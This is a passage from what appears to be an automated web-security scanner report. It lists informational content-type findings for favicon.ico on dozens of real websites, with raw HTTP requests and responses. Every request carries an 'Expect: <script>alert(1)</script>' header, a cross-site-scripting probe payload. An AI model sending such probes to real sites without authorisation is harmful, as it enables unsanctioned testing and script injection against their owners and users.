Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.130. http://www.learn2grow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.learn2grow.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.learn2grow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:46 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.131. http://www.leeannwomack.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.leeannwomack.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leeannwomack.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:41:35 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.132. http://www.leggs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.leggs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leggs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:31:22 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.133. http://www.lionel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lionel.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lionel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.134. http://www.list-of-companies.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.list-of-companies.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.list-of-companies.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.135. http://www.livedownloader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livedownloader.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livedownloader.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:16:23 GMT
Server: Microsoft-IIS/6.0
Connection: close
Content-Type: text/html
Content-Length: 27

Page not found: favicon.ico

31.136. http://www.longwood.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.longwood.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.longwood.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:48:32 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.137. http://www.lunchboxes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.lunchboxes.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lunchboxes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:29:16 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.138. http://www.magiclegs.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.magiclegs.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.magiclegs.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.139. http://www.makeuptalk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.makeuptalk.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.makeuptalk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:35:36 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Wed, 27 Apr 2011 16:55:42 GMT
X-VBackend-By: app007,D=3762
Content-Length: 1150
X-Varnish: 1121897744 1116496264
Age: 22842
Via: 1.1 varnish
X-Served-By: varnish001.huddler.com
X-Cache: HIT
P3P: policyref="http://www.huddler.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

............ .h.......(....... ..... ..................................v^ .v^..v^..v^..v^..v^..v^..v^..v^..v^..v^p.v^..............v^`.v^..v^..v^..v^..v^..v^..v^..v^..v^..v^..v^..v^..........v^ .v^..v
...[SNIP]...

31.140. http://www.mallseeker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mallseeker.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mallseeker.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:16:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.141. http://www.marketingallianceassociation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.marketingallianceassociation.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marketingallianceassociation.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:45:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.142. http://www.mathfactcafe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mathfactcafe.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mathfactcafe.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:11:36 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.143. http://www.mcagfair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mcagfair.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mcagfair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Served-From: web1.270net.com
Date: Wed, 04 May 2011 01:52:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.144. http://www.mdlinx.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mdlinx.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mdlinx.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:02:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.145. http://www.mediaho.me/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mediaho.me
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaho.me
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:48:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.146. http://www.metrocast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.metrocast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metrocast.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:59:07 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.147. http://www.miallstate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.miallstate.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miallstate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 04 May 2011 01:04:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.148. http://www.midmichigan.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.midmichigan.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.midmichigan.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:28:37 GMT
Content-Length: 60
Set-Cookie: TS1d8c95=03770d35edeee9b4c496026431d4b238da8b60e10ef16e944dc0c91e; Path=/

The page cannot be displayed because the expectation failed.

31.149. http://www.miningjournal.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.miningjournal.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miningjournal.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:36:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.150. http://www.minnesotajobnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.minnesotajobnetwork.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.minnesotajobnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:42:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.151. http://www.momsupdated.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.momsupdated.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.momsupdated.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:48:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.152. http://www.monsterscooterparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.monsterscooterparts.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.monsterscooterparts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:52:18 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.153. http://www.mouseguns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mouseguns.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mouseguns.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:44:50 GMT
Server: Apache
Content-Length: 20
Content-Type: text/html; charset=iso-8859-1

Expect not supported

31.154. http://www.mts.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mts.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mts.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 04 May 2011 00:57:58 GMT
Content-length: 824
Content-type: text/plain
Last-modified: Sat, 12 Jul 2008 04:27:30 GMT
Etag: "338-487832b2"
Accept-ranges: bytes

BM8.......6...(........................................PC.C5.C5.C5.C5.C5.C5.C5.C5.C5.C5.C5.C5.C5.C5.PC.@2y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'.@2.C5y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'y6'.C5.C
...[SNIP]...

31.155. http://www.mvcc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mvcc.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mvcc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:24:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.156. http://www.mypdfsearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mypdfsearch.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mypdfsearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:13:11 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.157. http://www.mysimplemobile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mysimplemobile.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mysimplemobile.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:52:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.158. http://www.napaprolink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.napaprolink.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.napaprolink.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:52:58 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.159. http://www.nationaltrailersupply.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nationaltrailersupply.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationaltrailersupply.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 04 May 2011 03:02:04 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

31.160. http://www.nhrmc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nhrmc.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nhrmc.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:37:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!--
    Build Date: 12/29/2010 10:47:56 AM
SiteMaker Release: SM7.1

Code created by:
Medseek, Inc.
2028 Village Lane
Solvang, CA. 93463
Phone 1-888 MEDSEEK
email info@me
...[SNIP]...

31.161. http://www.northwestms.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.northwestms.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northwestms.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:51:18 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.162. http://www.odometer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.odometer.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.odometer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 01 Jul 2010 15:50:48 GMT
ETag: "a1058c-47e-48a556f1f0600"
Accept-Ranges: bytes
Content-Length: 1150
P3P: policyref="http://www.odometer.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=147431
Expires: Thu, 05 May 2011 19:02:59 GMT
Date: Wed, 04 May 2011 02:05:48 GMT
Connection: close

............ .h.......(....... ..... .......................... Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z.. Z..!
...[SNIP]...

31.163. http://www.oempcworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.oempcworld.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oempcworld.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:23:57 GMT
Server: Apache
Content-Length: 13
Content-Type: text/html; charset=iso-8859-1

Expect failed

31.164. http://www.officefurniture2go.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.officefurniture2go.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.officefurniture2go.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo HIS TELo OUR IND STA"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:05:44 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.165. http://www.ofree.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ofree.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ofree.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP
Date: Wed, 04 May 2011 01:53:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.166. http://www.onecallnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.onecallnow.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onecallnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:50:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.167. http://www.onlineincomeflood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.onlineincomeflood.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
